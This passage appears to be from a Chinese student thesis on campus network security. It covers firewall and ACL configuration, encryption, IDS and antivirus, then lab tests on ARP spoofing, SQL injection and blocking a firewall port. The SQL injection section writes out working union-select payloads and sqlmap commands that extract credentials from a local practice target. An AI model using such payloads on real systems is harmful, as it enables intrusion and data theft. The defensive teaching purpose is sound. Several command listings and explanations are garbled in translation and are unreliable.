(5)用 route 命令指定向外传输的数据包路由的下一跳Pix(config)#route outside 0.0.0.0 0.0.0.0 1.1.1.2 1 最后的数字 1 指明到下一跳路由器只有一跳

(6)使用 NAT 命令允许所有内网主机初始化外向连接

Pix(config)#nat (inside) 1 0 0

Pix(config)#nat (dmz) 1 0 0

下一个任务是为内部主机设置一个全局池,用于与外部Web服务器或 DMZ 通信。

Pix(可选)#ao(外部)1 1.1.1.20-1.1.1.254 netmask255.255.255.0

(7)定义静态映射

Pix(config)#static (dmz,outside) 1.1.1.19 192.168.2.2

注:第一个地址指明了一个IP地址,这个地址是由一个外部宿主来存取内部的。第二个 IP 地址是一个解释程序的内部地址,它可以提供内部的服务以及外部的服务。

  1. 虽然为静态映射,但是ASA在PIX上不能让外部的操作者存取DMZ相关的业务。由于DMZ 的安全性等级(50)比外部界面(0)更高。当然,ASA 不会允许 ICMP 的通信。让以上的服务(例如网络)能让外部主机使用。直到 5.0.1版的PIX,Pix (config) #conduit 权限可用。

tcp host 1.1.1.19 eq www anyPIX v5.0.1 及以后的版本支持访问控制列表。

Pix(config)#access-list 101 permit tcp any host 1.1.1.19 eq www

Pix(config)#access-group 101 in interface outside

每当更改 PIX 上的 NAT 或管道设置时,必须运行显式 xlate 以便 ASA 可以应用更改。(如果保存设置,更改也会生效)。

(9)保存配置

Pix(config)#write memory

2、防火墙实现的功能

根据学校网络的安全需求,我们的防火墙功能具有以下优势。

(1)对未授权的报文进行有效的拦截,避免了未经许可的报文经过安全的访问。

(2)使内部网络使用者能够存取局域网及外部网络组件,而不能存取没有特定存取服务的网络。通过这种方式,使内网用户能够接受到防火墙所规定的业务,同时也能阻止DMZ用户对DMZ网络进行攻击。

(3)使外部网能够接入DMZ局域网的服务器,并能控制DMZ局域网的存取,避免外网受到DMZ跳板内网的入侵。

(4)启用防火墙防攻击服务,对通过防火墙的所有通信进行检测。

(5)启用桌面记录服务,对通过防火墙的数据进行记录,并对各网口的进程进行计算。通过对系统的日志记录,可以对安全事故和入侵进行追踪与分析。

5.2.2 访问控制技术

访问控制技术是指系统识别用户及有效限制其使用资源的方式,保证计算机在合法范围内可以被使用[11]。它的主要目标是限制获取信息的途径,保证在合法的条件下,有效地处理和利用数据。本质上,访问权限执行两个功能:识别和验证访问系统的人员,以及确定用户是否有可以访问某些类型的数据资源访问权限。

管理员通常会利用存取控制来限制用户对网络资源的存取,如浏览器、列表及档案。它对保障网络的保密、完整性、隐私性和权威性具有重要意义,是防御网络安全问题和增强信息安全保护的关键策略之一。

访问控制技术可以高效控制三级网络用户对网络资源进行的访问,并且允许在两个网络设备之间进行唯一的网络请求。它还可以了解如何管理对网络组件的关键访问控制,并为网络应用程序提供安全措施。

  1. 多媒体教室应用案例

例如,校园多媒体教室有电脑、投影仪、多媒体集中控制系统,通过多媒体课堂专用VLAN连接到校园网络和Internet。部分学生将可以访问办公室管理系统的会话,提出疯狂的BT问题,回到课堂上浏览互联网,并在晚上的课堂上观看反映自己的项目电影。另一方面,这些功能具有视频监视器、计算机系统和中央控制台等设备的许多弱点,这与正常的训练系统特别相关。同时,PZP流量过大,占用了网络的大部分带宽输出,导致其他部门无法上网。基于以上部分,采用ACL输入线路技术,采用的解决办法是

  1. ACL访问控制技术采用时间延伸。

  2. 在课前和课后10分钟内不得使用网络。

  3. 其它的FTP、QQ等网络应用,可以随时使用。

根据定义的校园网络VLAN多媒体类别(见图1-4),我们将扩充ACL存取控制列表部署到各个指令层的总开关上。

添加图片注释,不超过 140 字(可选)

图1-4 多媒体教室 VLAN 在校园网中的拓扑结构

使用步骤:

  1. 将输入时钟设置为与固定时钟同步。

  2. 定期设置一个 ACL 时间段,且在一星期之内安排全部的校园会议。

3、设置一个长的ACL访问控制列表规则,在闲置时间内不能使用,但是可以让其它的网络服务正常工作。

4. 利用 ACL 访问控制列表规则对VLAN 多媒体类别进行扩展。

具体工作流程如下:

(1)配置(校准)交换机的时钟

SwitchA #Watch 15:25:00 06 05 2014

提示:(a) 将时间设置成 2014-05-06 15:25:00 与实际时钟保持一致。

(b) 注意部分时钟设置仅支持日期数字,不支持文本日期。

(c) 此步骤十分重要。 因为ACL政策取决于未来监管的时机,因此ACL需要进行调整。

(2)定义时间段 deny-http

SwitchA #配置终端! 在此处登录以切换到全局配置模式。

SwitchA (config) #reject 间隔 - http

输入一个名为!Deny-http 的间隔配置模块。

SwitchA (config-time-range) # 每周 00:00 ~ 07:50

上课时间:周一至周五00:00至07:50,即早课前。

SwitchA(config-time-range)# periodic weekdays 12:00 to 13:20

!定义周期性时间段:周一至周五的 12:00 到 13:20,即午饭及午休时段。

SwitchA(config-time-range)# periodic weekdays 15:10 to 23:59

安排时间:周一至周五15:10至23:59,即下午放学后。

SwitchA(config-time-range)# periodic weekend 00:00 to 23:59

!定义周期性时间段:周六、周日的 00:00 到 23:59,即周末全部时段。

SwitchA(config-time-range)#exit

SwitchA(config-time-range)#

建议:(a)周一至周五的学校停课以及周六和周日的所有时段(即每周总小时数)被定义为正常时段。

(b)确定课时时,必须根据学校实际情况明确划分课时,以免错过课时。

(3)定义访问控制列表规则 limit-http

SwitchA(config) #ip aceess 一 list extended limit 一 http

!定义一个名称为 1imit- http 的扩展 ACL,并进入这个 ACL 配置模块

SwitchA(config-ext-nac1)#deny tcp any any eq www time-range deny-http

!在 deny-http 这个周期性时问段内禁止所有的 HTTP 数据流

SwitchA(eonfig-ext-nacl)#permit ip any any !允许其他数据流通过

说明:(a)定义一个 1imit-http 扩展ACL访问控制列表。增加了两条规则:一条禁止访问www,一条允许从其他web服务转发数据,一条在指定时间段内被deny-http包围。

(b) 在定义ACL规则时,不要忘记添加结束授权规则,因为所有免责声明都是访问控制列表的隐含规则开始。

(4)在接口上应用访问控制列表规则

SwitchA (config)#interface vlan 249

!进入多媒体教室专用 vlan 的 SVI 虚拟接口

SwitchA (config)#ip aeeess-group limit-http in

ACL推送应用在专用 VLAN 多媒体类的 SVI 接口中实现。

说明:将指定的访问控制列表规则 1imit-http 应用于 vlan249,仅适用于多媒体类。

(5)查看定义的时间段和访问控制列表

SwitchA #show time-range

time-range name:deny-http

periodic Weekdays 0:00 to 7:50

periodic Weekdays 12:00 to 13:20

periodic Weekdays 15:10 to 23:59

periodic Weekend 0:00 to 23:59

!查看指定时间段的当地信息。

描述:查看时间框架,看看是否缺少课外时间。

SwitchA #show aeeess-list limit-http

Extended IP aeeess list:limit-http

deny tcp any any eq www time-range deny-http <active>

permit ip any any <active>

描述:查看定义的 ACL 规则以确保规则得到正确执行。

上面为每次集合更改实现了一个 ACL 访问控制列表规则。除了满足通识教育的网络应用需求外,还解决了学生在多媒体课堂上不被互联网束缚的问题。

5.2.3 数据加密技术

数据加密技术旨在将某一个信息经过加密钥匙以及加密函数转换,使其变成无意义的密文,发送者可以通过执行分析和解码功能将密文再次转换成为明文。要保证网络应用的整体安全性,应用数据加密技术时应注意管理关键连接,加强加密技术应用的安全度。

1、利用加密技术,提高数据的加密效率。加密技术分为私有技术和公共技术这两大类[12]。 一种特殊的加密方法是在发送者和接收者之间建立特殊的连接,创建一个统一的密钥。数据传输和收集是开放的,有一组密钥来保存数据。而利用公用密钥则是数据获得方使用单独密钥打开数据密钥,这种方式在实际应用中较为常用,整体防护效果更好。

2、应用节点加密技术。传输数据信息的程序是透过多个网络去完成目标计算机的访问,但若遭遇网络病毒或恶意攻击,则会造成资料损毁。在部署了节点加密技术之后,各个节点都要对其进行加密,以有效避免目标攻击。

3、数据库加密技术。第一种加密方法是设置密码、权限或密码,容易丢失或被盗。加密安全数据库以保护帐户的隐私和安全。如今,大多数云操作系统平台都非常注重加密技术的使用,大多数操作系统的安全级别为C1或C2级。智能识别用户、注册存储、应急控制。

4.连接加密技术。通过执行与管理计算机网络安全时相同的点对点加密,对所有连接执行不同的加密过程。同时,账户和投递方式也在不断变化,有效保证了加密的安全性。

例如,在物流信息系统的物流问题中,用户登录认证是保证物流信息系统安全的第一道屏障。需要对访问目标(用户)和访问目标(资源)进行详细分类。 如果正确识别了访问主体(用户),则可以根据主体的操作授予访问属性的权限。

在传统的用户身份验证方法中,采用MD5算法,用户需要在客户端输入口令和用户名称。通过MD5对密码进行了加密,并将密码连同使用者名称一起传送至服务器,用户在客户端输入密码和用户名。密码用MD5加密后和用户名一起发送到服务器,服务器认证模块与数据库中的密码和用户名称一致[13]。若一致,则该用户是系统的授权用户,被允许访问。由于MD5算法的不足,仅对密码认证使用MD5加密无法准确确定访问头。

如果密码在客户端和服务器之间传输过程中被盗用或被法律问题截获,用户的常规存取会遭到威胁,所以密码必须被重新加密。对称式算法采用公用密码,能够大量产生,不需要数据传送通道,因而适合于密码令牌。

为了达到提高信号的安全性的目的,这个方法采用了非对称RSA算法。如前所述,RSA算法是一种公共编码系统,公共编码是公开的,用RSA算法加密的数据只能用单独的密钥解密。结合MD5算法和RSA算法的双重加密方式,在发送的同时保护密码的安全。身份验证序列设计如图1-5所示。

图1-5 身份认证时序图

当用户向客户端发起访问请求时,Web服务器使用RSAUtils类生成publicKey公钥和私钥,私钥存储于服务器中,公钥返回到客户。客户端依据用户输入的用户名和pk密码进行加密过程,客户端中的数据通过JavaScript进行加密。对于 RSA 加密,密文 m = RSA (publicKey, MD5 (pk)) 使用客户端的公共 ID 和用户密码。 PrivateKey服务器借助它来检验加密数据的准确度,并将MD5(pk)解密后的数据信息连接到数据仓库中的salt,再进行MD5。若与数据库中存储的密码相匹配,那么用户就可合法登录。否则,用户的登录请求会被拒绝,并且会回到系统的登录页面。

这就是整个验证流程。提出了一种高效的RSA算法,能够在数据传送时降低安全性风险,避免因数据泄露而导致的感染,保证传输数据的机密性。由于 RSA 算法的安全性取决于对象的复杂性,因此大数 n = p * q 的选择必须很大,首选 p 和 q 作为强素数。RSA算法不需要第三方,易于掌握,适应开放的网络环境。双重加密为数据提供了更高的安全性,破解了漏洞,提高了系统安全性。

5.2.4 入侵检测系统

入侵检测系统 (IDS) 是一种实时监控网络流量的系统。它是一类网络安全设备,可以在检测到可疑信号时发出警报或进行干预,可以弥补防火墙技术中的一些不足之处,相对来说是更加成熟完善的检测技术,确保系统在网上安装,加强了管理员的安全管理能力,提升了信息安全基础架构的可靠性能。IDS作为一种安全策略与手段,可广泛地部署在各种类型与规模地企业当中。

恶意监控系统与其他安全产品的不同之处在于它们更简单,并且可以过滤捕获的数据和分析结果。综合搜索系统可以保证网络的安全,减少管理员的工作量。因此,入侵检测是企业网络安全系统的二级安全网关,该系统能够对网络的性能进行实时检测,保证了网络的安全性,这可以做到以下几点:

  1. 对用户及系统的行为进行监测与分析。

  2. 对体系的结构和缺陷进行研究。

  3. 确定并对攻击行为的类型作出反应,并向网络管理员发出警报。

4、异常行为模式的统计分析

5. 对系统的资料信息进行评估。

6. 监测操作系统的执行情况,判断使用者是否有违反安全性政策。

大多数集成搜索引擎包括仪表板和浏览器。控制台用于创建策略和管理所有搜索引擎。该屏幕检测到攻击网络的入侵行为并将其显示在控制台上。一些事件需要提交到控制台,控制台根据其他研究的特征进行全局分析。检测器进一步细分为网络检测器和基于主机的检测器。

1、网络监控机是一种特殊的设备,可以随时监控数据集进出网络的行为。 网络监控机器接收数据包,因此不会影响网络的性能。

2、将在互联网上的所有主机上安装主机到主机监视器,以分析系统并记录实时应用程序检查以进行入侵检测。

由于监视器用于监视而不是分析,因此入侵搜索系统不会显着影响网络操作。

图 5-3 显示了如何设置入侵检测系统:

图 1-6 入侵检测系统示意图

如上图所示,入侵检测设备与VPN安全设备配合使用。入侵检测设备通常只用于通过VPN安全设备扫描网络中的每一个网络。Intrusion Detector 开始检查网络的当前状态,并在检测到故障时立即向您发出警报。然后 VPN 设备与网络断开连接,并记录攻击以供以后验证。

5.2.5 防病毒技术

防病毒技术是一种防病毒技术,它基于与操作系统协同工作的工具,以防止大多数针对洪水漏洞的攻击。杀毒技术可以分为三类:杀毒技术、病毒检测和杀毒预防。

  1. 杀毒技术:杀毒技术是一种自动化测试技术,即性能测试技术。利用专门的技术手段来预防电脑病毒的侵扰和毁坏。尤其是它的目标是对病毒规则进行归类和管理,在以后的行为中,若有相似的发生,将被视为电脑病毒。其主要内容有:磁盘扇区保护、加密方案、读写管理、系统监测等[14]。

2.病毒检测技术:一种根据病毒本身的特征、关键字以及文件长度的改变来判定病毒的方法。

3、杀毒预防技术:我们研制的软件能够对电脑病毒进行分析,将杀毒程序进行清理,还原出原来的文件信息。

本文中的杀毒技术包括高性能的事件运行启发式扫描系统、卡巴斯基的SafeStream病毒库和多核操作系统调试技术,用于检测和修复商业病毒网络。它将克服目前网关杀毒性能低下的诟病,为校园网络安全提供全新的安全解决方案。防病毒技术通过对营地网络入口处的病毒检测,做到高效防范来自网络外的病毒入侵或攻击,增强校园网络的保护力度。

防病毒技术使用集成到卡巴斯基提供的 SafeStream 病毒数据库中的应用信号引擎来配置病毒检测和防护。处理模型如图1-7 所示。

图1-7 防病毒技术的处理模型

1、SafeStream病毒库是卡巴斯基实验室(Kaspersky AVLab)所提供的病毒特性数据库,该数据库由卡巴斯基实验室提供,并得到了升级。卡巴斯基实验室在世界各地建立了多个病毒收集站,并追踪和收集了病毒样品。卡巴斯基实验室随后分析、提取特征码,进行测试,最后向 SafeStream 病毒库中加入该病毒的特征码。Kaspersky SafeStream 病毒库的分级标准把病毒划分为:web蠕虫和常见病毒,木马,MalWare 的相关程序(灰色软件、其他恶意程序)。

2、应用信号机根据网络流量生成协议信号。高性能内容扫描程序访问 SafeStream 病毒特征库以检测病毒特征。与涉及旧签名的杀毒搜索不同,应用通知引擎根据协议信息进行深度杀毒搜索。这样可以避免阳性结果的发生,提高病毒检测的准确性。

3. 当检测到病毒时,反病毒工具会响应反病毒规则中指定的动作。响应反应是以下一种或多种行为的结合:

  1. 准许:准许未经处理的检测到的病毒信息被传输。

  2. 阻止:阻止对检测到的病毒信息不进行处理的行为。

  3. Block:防止病毒包通过。对于中断行为,除中断当前消息以外,还能设置以下参数来阻止: 锁定病毒的来源。万一源病毒被隔离,所有后续的数据包都不能通过,否则只有检测到攻击的数据包会被丢弃。 对于 TCP 应用程序,还可以选择是否发送 TCP 消息。如果你想把一条信息返回到TCP,你可以把它传送到源的方向、目标目的地或者二者。也可以使用HTTP存取的方式来回复讯息或指定网页。可以在定制的回应页添加规则名称,规则说明和其它定制的讯息。

  4. 警告:一旦发现了一个病毒,就会将其记录下来。病毒事件可以输出到一个本地的数据库,然后用email通知管理员,然后输出到使用者或系统日志服务器。

4.该病毒资料的更新支持线上升级,且不会对系统的正常操作造成任何影响。在病毒资料升级完毕后,不需要重新启动,就会自动进行病毒库的更新。

在病毒库升级期间,若病毒更新不成功,将会自动回到被感染之前的病毒库,而不会对系统造成任何影响。

使用者可自行或手动更新,并下载最新版本的病毒资料库更新套件,以达到最佳的防毒效能。

自动升级:使用者可以根据需要设定病毒库的自动升级次数。为了避免由于网络条件差而无法进行升级,我们推荐在网络流量很小的时候进行自动更新。

人工更新:使用者可以在本公司放入网页上下载最新的病毒数据升级包,并通过人工的方式进行更新。

以上杀毒技术拥有以下优势:

1.检测病毒和杀死病毒的能力。

2.对新病毒的快速响应。

3.强大的实时监控。

4.更新快捷方便。

5.支持智能输入和远程配置。

6、操作简单,操作方便。

7、系统兼容性强,集成性强。

5.3管理方案

5.3.1 完善法律法规监管制度

现代科技的不断发展,使网络不安全行为的发生越来越频繁,且方式和手段也逐渐“多样化”,很多网络安全问题变得无法可依,因此网络环境日益乌烟瘴气,更加助长了不法分子的嚣张气焰。

确立严格的制度,是遏制犯罪行为的重要一环。网络建设方案、机房管理制度、人员职责划分、保密协议、口令管理制度、网络安全管理规范、用户使用手册、网络应急响应方案等,保证了网络中心高安全、高可靠地运行下去[15]。在源头上减少网络危害的发生。

另外,国家网络安全相关部门需尽快建立健全相关的法律法规,与时俱进,根据不同的网络犯罪行为不断细化法规条例,以此来精准捕捉网络不安全因素,加强对信息数据的保护机制。

5.3.2 加强互联网企业的网络监督力度

在网络安全监督中,大致分为三种监督模式,分别为事前监督、事中监督和事后监督。这三种监督模式分别对应不同的监管方向。

1、事前监督应当在大数据时代下,加强对互联网公司的准入审查,强化防范措施,严禁未设置大数据安全防护体系的企业进入。

2、事中监督要加强对网络公司信息采集环节的监管和检查,避免网络信息采集过程中的违规和违法现象发生。

3、事后监督如一旦发现网络公司或企业利用非法手段窃取数据或信息,应立即制止或强制停止,并根据相关的法律和法规予以其惩处。

网络技术工作者要不断学习新的网络安全知识,新的网络产品功能、新的攻击手段、新的防护策略,以及充分了解网络病毒、 IP欺骗、数据篡改、拒绝服务等多种攻击方式。

5.3.3 树立网络安全意识和防范意识

复杂的网络环境,除了需要严加管控网络不法分子的所作所为,还需要网络用户自身的高度安全防范意识,为网络安全助一臂之力。

对于青少年,学校应适当开展网络安全相关拓展课程,杜绝网络不良信息危害青少年身心健康;

对于父母一辈,企业以及公司应进行相应的培训学习,防止信息泄露或被盗取,危害自身利益;

对于老年人,学习网络安全防范更是必不可少,社区或街道应多多科普如何识别网络诈骗手段或网络诈骗形式,不轻信,不妄信,要引导网络使用者自行安装反病毒软体,并能自觉升级系统,对于不了解、不清楚的程序,勿随意安装,以免误入网络安全之圈套,危害个人财产安全。提高用户的网络安全意识,对维护网络的安全具有十分重要的意义。

5.4本章小节

本章概述了网络安全策略,应对网络安全问题的技术方案与管理方案,重点分析了技术方案中的防火墙技术、访问控制技术、数据加密技术、入侵检测系统和防病毒技术,其次分析了管理方案同样对网络安全有重要意义,两者需要齐头并进,共同维护网络安全。


  1. 模拟仿真测试

6.1 ARP欺骗攻击与防御测试

6.1.1 ARP协议

ARP即地址解析协议(Address Resolution Protocol)的简称,该协议是TCP/IP协议簇里的一个协议。ARP的主要作用是根据IP地址来获取对应的MAC地址。在开放式系统互联(Open System Interconnection,简称OSI)模型当中,所有网络通信的工作被分为了7层,如下图所示:

在网络进行通信时,OSI模型当中的每一层都只负责各自的工作,然后将处理完的数据传送给下一层。ARP协议提供了网络层地址到物理地址之间的动态映射,是地址解析的通用协议。

6.1.2 ARP协议工作原理

每一个主机在 ARP缓冲区里均会创建自己的 ARP表,用来显示其中IP地址与MAC地址所对应的关系。在源主机向目标主机传送一个数据包时,首先需要查看它的 ARP表中有没有与 IP地址所对应的 MAC地址,若有,便直接向此 MAC地址传送数据包,否则,发送一个ARP请求的广播数据包到本地网段,以查找该目标主机的 MAC地址。这个 ARP数据包必须包含源主机IP位址、硬件位址和目标主机IP地址。

网络上的主机得到ARP请求后,查看数据包中的目标IP地址是不是与自己的IP地址相同,若不相同则忽略这个数据包,不作任何回应。若相同,此主机便会将发送端的MAC地址以及IP地址添加进自己的ARP列表里,若列表里已然有了此IP的数据,就会把它替换,并把自己的MAC地址填进ARP的响应数据包里,最后再传送给源主机,告诉对方自己便是它在寻找的MAC地址。

在源主机接收到ARP的响应数据包后,便会把接收到的目的主机的IP地址和MAC地址增加到自己的ARP列表,再通过这个信息开始数据的传送。若源主机始终没有得到ARP的响应数据包,就代表ARP查询失败了。

6.1.3 实验目的

本次实验主要就是通过ARP欺骗对受害主机进行断网攻击,使其无法正常访问网络,最后通过静态绑定受害主机的MAC地址,实现防御效果,在攻击的情况下恢复正常访问网络。

其中需要运用到ARP欺骗,ARP欺骗又被称为ARP毒化,属于中间人攻击,也就是通过毒化受害机的ARP缓存,将其网关的MAC地址替换成攻击者的MAC地址,于是攻击者的主机就充当了受害主机的网关,之后攻击者就可以对受害主机进行断网、窃听或篡改数据等攻击行为。

6.1.4 实验环境

本次实验环境选择的是VMware虚拟化环境,由于我的电脑是MAC系统,下载安装好VMware软件后,又在VMware虚拟机中分别装了Windows10系统和Kali Linux系统,整个测试过程均是在虚拟环境中完成。

Kali Linux 是基于 Debian 的 Linux 发行版, 设计用于数字取证操作系统。每一季度更新一次。Kali Linux 预装了许多渗透测试软件,包括 nmap 、Wireshark 、John the Ripper,以及 Aircrack-ng.[2] 用户可通过硬盘、live CD或 live USB 运行 Kali Linux。Kali Linux 既有 32 位和 64 位的镜像。

VMware中Windows系统网卡和Kali系统网卡均选择的是桥接模式,在桥接模式下,Kali虚拟机和Windows虚拟机就可以直接使用宿主机网卡上网段的IP,也就是保证他们在同一个局域网中。

6.1.5 实验步骤

1、环境准备

2、查看Windows10虚拟机和Kali虚拟机的IP地址以及mac地址

3、确认是否在同一一局域网中,实现网络互通

4、发送ARP欺骗

添加图片注释,不超过 140 字(可选)

5、Windows10虚拟机无法访问网络

添加图片注释,不超过 140 字(可选)

6、再次查看Windows10虚拟机的MAC地址

在这里可以看到进行ARP欺骗后Windows10虚拟机的mac地址已经不是原来正确的mac地址,而是变成了00-0c-29-cd-e8-44,而这正是Kali端的mac地址,也就是说这里实现了Kali虚拟机充当了Windows10虚拟机的网关,使其断网,无法正常访问网络。到这里,断网攻击部分已经达到了相应的效果,接下就需要进行防御措施,防止这种断网攻击。

7、查看Windows10虚拟机网卡的idx编号,网卡编号为10

添加图片注释,不超过 140 字(可选)

8、在Windows10虚拟机中进行静态地址绑定,查看mac地址

在这里可以看到完成静态地址绑定后,mac地址变回了原来正确的地址。

9、Windows10虚拟机恢复上网功能

于此同时,Kali虚拟机仍在不断发送ARP欺骗数据包,但由于Windows10虚拟机已经完成静态地址绑定,所以所有上网的数据流量都会发送给目前正确的网关,实现正常访问网络。

6.2 SQL注入攻击与防御测试

6.2.1 SQL注入简介:

SQL注入漏洞最早为公众所知是在1998年12月25日发表的第54期著名黑客杂志《Phrack》上一位名叫Rain Forest Puppy的黑客发布的一篇题为NT Web Technology Vulnerabilities的文章中。 SQL注入可以说是在企业运营中会遇到的最具破坏性的漏洞之一,它也是目前被利用的最多的漏洞。针对SQL注入的攻击行为可描述为在用户可控参数中注入SQL语法,破坏原SQL语句的结构,从而达到攻击目的。

添加图片注释,不超过 140 字(可选)

6.2.2 SQL注入原理

将sql代码伪装到输入参数,传递到服务器解析并执行的一种攻击手法。

即在一些对server端发起的请求参数中植入一些sql代码,server端在执行sql操作时,会拼接对应参数,同时也将一些sql注入攻击的“sql”拼接起来,导致会执行一些预期之外的操作。

网站内部直接发送的Sql请求一般不会有危险,但是现实情况中, Sql语句的构建往往是要与用户的输入数据相结合的,如果用户的数据是恶意构造的 Sql代码,而 Web程序又并没有检查动态构建 的Sql语句所用的参数,则会带来意想不到的危险。

Sql 注入会带来以下几点威胁:

  1. 猜解后台的数据库,这是最常用的窃取网站隐私数据的方法。

  2. 绕过认证,例如通过验证登录网站的后台。

3、注入可以借助数据库的存储过程进行提权等操作

Sql注入可以依据不同情况进行不同的手法注入,大致为以下几类:

添加图片注释,不超过 140 字(可选)

6.2.3 实验目的

本次实验主要利用联合注入以及使用自动化sql注入工具sqlmap来完成对本地搭建的靶场进行数据库敏感信息的获取。其中包括了靶机数据库的库名,数据库表名,数据库列名以及字段名的获取。

6.2.4 实验环境

Sqllab是印度程序员所写的一款从基础到复杂的一个sql注入的练习靶场,对于初学者练习非常有用。

WampServer是Microsoft Windows操作系统的解决方案堆栈,是Romain Bourdon 一手创建的,它包括Apache Web 服务器、支持 SSL的OpenSSL、MySQL数据库和PHP编程语言。方便一键搭建php集成开发环境。

6.2.5 实验步骤

1、环境准备

启动WamServer:

设置MySQL密码:

mysql>set password =password(‘123456‘);

mysql>flush privileges;

修改sqllab下的配置文件密码:

添加图片注释,不超过 140 字(可选)

点击设置数据库,设置成功

访问sqllab第一关,无报错即搭建成功:

修改第一关源代码:输出sql语句,方便观察与调试

添加图片注释,不超过 140 字(可选)

  1. 实验步骤

(1)找到注入点,发现报错回显。

?id=1

此时SQL注入的语句为SELECT * FROM users WHERE id='1'' LIMIT 0,1,可以发现在id附件多了一个引号。

添加图片注释,不超过 140 字(可选)

并且看到报错语句。

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1

用--+或者%23注释引号

发现已经闭合,只要在后面加--+或者#注释掉后面的sql语句,回显正常。

添加图片注释,不超过 140 字(可选)

(2)猜字段数。

?id=1'order by 3--+

由1遍历到3发现回显正常:

(3)使用联合查询。

?id=-1'union select 1,2,3--+

查询后面select查询的信息

(4)注入查询基本信息

?id=1'union select 1,2,concat_ws(char(32,58,32),user(),database(),version())--+

此时后端的sql语句为:SELECT * FROM users WHERE id='-1'union select 1,2,concat_ws(char(32,58,32),user(),database(),version())--

得到用户名root@localhost :数据库 security : 版本信息5.7.31

(5)爆库

首先说一下mysql的数据库information_schema,它是系统数据库,安装完就有,用来记录当下数据库的数据库,表,列,

以下是常见的几种表类型:

SCHEMATA表:用于存储mysql全部数据库的基本信息数据,数据库名,编码类型路径等均包含在内,show databases的结果就是源于这个表。

TABLES表:储存mysql中的表信息,包括这个表是基本表还是系统表,数据库的引擎是什么,表有多少行,创建时间,最后更新时间等。show tables from schemaname的结果取之此表

COLUMNS表:提供了表中的列信息,(当然包括数据库名和表名称)详细说明了其中哪一张表的所有列,包括每个列的信息以及该列是哪个表中的第几列,列的数据类型,列的编码类型,列的权限,列的注释等。是show columns from schemaname.tablename的结果取之此表。

?id=-1'union select 1,group_concat(schema_name),3 from information_schema.schemata--+

得到数据库:

information_schema,challenges,mysql,performance_schema,security

  1. 爆库security的表名

?id=-1'union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'--+

添加图片注释,不超过 140 字(可选)

ps:table_schema=后面可以直接加单引号括起的数据库名,也可以是数据库的16进制,过滤单引号可用。

得到security数据库的所有表

emails,referers,uagents,users

(7)爆users列

?id=-1'union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'--+

得到user表的字段:

id,username,password

(8)爆数据

?id=-1'union select 1,username,password from users where id=2--+

得到user表的字段值,可以通过遍历id的值进行数值获取。

此时后端的数据库语句为:SELECT * FROM users WHERE id='-1'union select 1,username,password from users where id=2-- ' LIMIT 0,1

使用sqlmap完成自动化注入:

检测注入存在:

Sqlmap -u http://127.0.0.1/sqllab/Less-1/?id=-1

Sqlmap -u http://127.0.0.1/sqllab/Less-1/?id=-1 --dbs

使用 –dbs参数来获取数据库的库名:

添加图片注释,不超过 140 字(可选)

Sqlmap -u http://127.0.0.1/sqllab/Less-1/?id=-1 -D security –tables

来获取表名:

添加图片注释,不超过 140 字(可选)

Sqlmap -u http://127.0.0.1/sqllab/Less-1/?id=-1 -D security –T users -- columns

来获取列名:

添加图片注释,不超过 140 字(可选)

–dump -T “数据库” -D “表” -C “字段” #列出指定数据库的表的字段的数据

3、Sql注入防御:

对于数字型的注入,我们很难使用预编译的手段去防御,这里我们可以使用php中的intval函数去把字符串强制转换成数字,所以我们的恶意sql语句自然就失效了。

当我们输入之前的攻击语句:?id=1 union select 1,username,password from users where id=2--+

可以发现后端的sql语句并没有改变,从而实现了防御的效果。

6.3 防火墙配置之端口安全测试

6.3.1实验原理

1.端口号的作用

所谓端口号就是具有网络功能的应用软件的标识号。一个软件可以拥有多个端口号,这证明这个软件拥有不止一个网络功能。若想要接受外界的访问,系统便要开启一个端口,而给端口编号则是为了方便数据的传输和处理,数据使用端口号来通知传输协议传送给哪个软件来处理,若共用一个端口号来接收数据的话,当外界的数据包送来传输后便不知道送给哪个软件来处理,这样便会导致混乱。可见端口在网络数据的传输中有着不可或缺的意义和作用。

说明:防火墙在第五章已做详细分析,在此便不再赘述。

6.3.2 实验目的

在网络使用过程中,黑客或者不法攻击者通常会利用一些端口对网络进行入侵或破坏行为,本次实验将基于这个前提,通过配置防火墙的入站规则来阻止某个端口的访问,达到一种保护效果。防火墙的常用端口有:http80、https 443、ftp21、ssh22、 远程桌面3389 、mysql3306 、redis4389、 memcahce11211 、smtp25 、pop3 110,本次测试以http80为例。

6.3.3 实验环境

本次实验仍在虚拟机VMware中完成,服务器Windows server 2016和客户端Win10为实验对象。

服务器Windows server 2016 IP地址:192.168.115.132/24

客户端Win 10 IP地址:192.168.115.128/24

6.3.4 实验步骤

1、配置服务器与客户端ip地址

服务器IP地址配置

客户端IP地址配置

2、使用netstat -an 查看服务器端口开启与连接情况。

图上显示的端口均为本机开启的端口

  1. 安装服务器网站服务 安装服务器角色

添加图片注释,不超过 140 字(可选)

安装WEB服务器成功


打开WEB服务器角色查看绑定,我们可以看到默认绑定80端口

添加图片注释,不超过 140 字(可选)

  1. 我们再次使用netsatat -an 扫描端口开启情况 我们通过查看发现多了一个80端口,安装web服务器会默认开启80端口

  2. 在win10 客户端上使用ip加端口号的方式访问WEB网页

我们发现ip加端口可以访问到web服务器页

添加图片注释,不超过 140 字(可选)

6、现在通过配置防火墙,在入站规则中禁止80端口访问

打开防火墙高级安全界面

添加图片注释,不超过 140 字(可选)


新建入站规则

添加图片注释,不超过 140 字(可选)

规则应用与80端口

添加图片注释,不超过 140 字(可选)

规则为阻止连接

添加图片注释,不超过 140 字(可选)

给规则创建一个象征性名字

添加图片注释,不超过 140 字(可选)

查看创建的规则

添加图片注释,不超过 140 字(可选)

7、使用netstat 命令查看端口开启情况

我们发现80端口还在,因为我们只是阻止入站并不是把端口给关闭了

添加图片注释,不超过 140 字(可选)

8、在服务器本地使用ip加端口号的方式访问WEB网页

我们发现本地还可以访问,因为阻止的是外来的入站数据

添加图片注释,不超过 140 字(可选)

9、重9、新在win10客户端上使用ip加端口号的方式访问WEB网页

发现客户端已经访问不到网站了,因为阻止了从80端口的入站数据

添加图片注释,不超过 140 字(可选)

6.4 本章小节

本章主要完成了ARP攻击和防御模拟测试、SQL注入攻击与防御测试以及防火墙配置及端口安全测试,前期搭建实验环境耗费较大精力,实验过程中也发现许多问题。通过三个实验切身感受了攻击和防御的原理以及手段,更好地理解了网络安全还需不断在实践中努力。


第7章 结束语

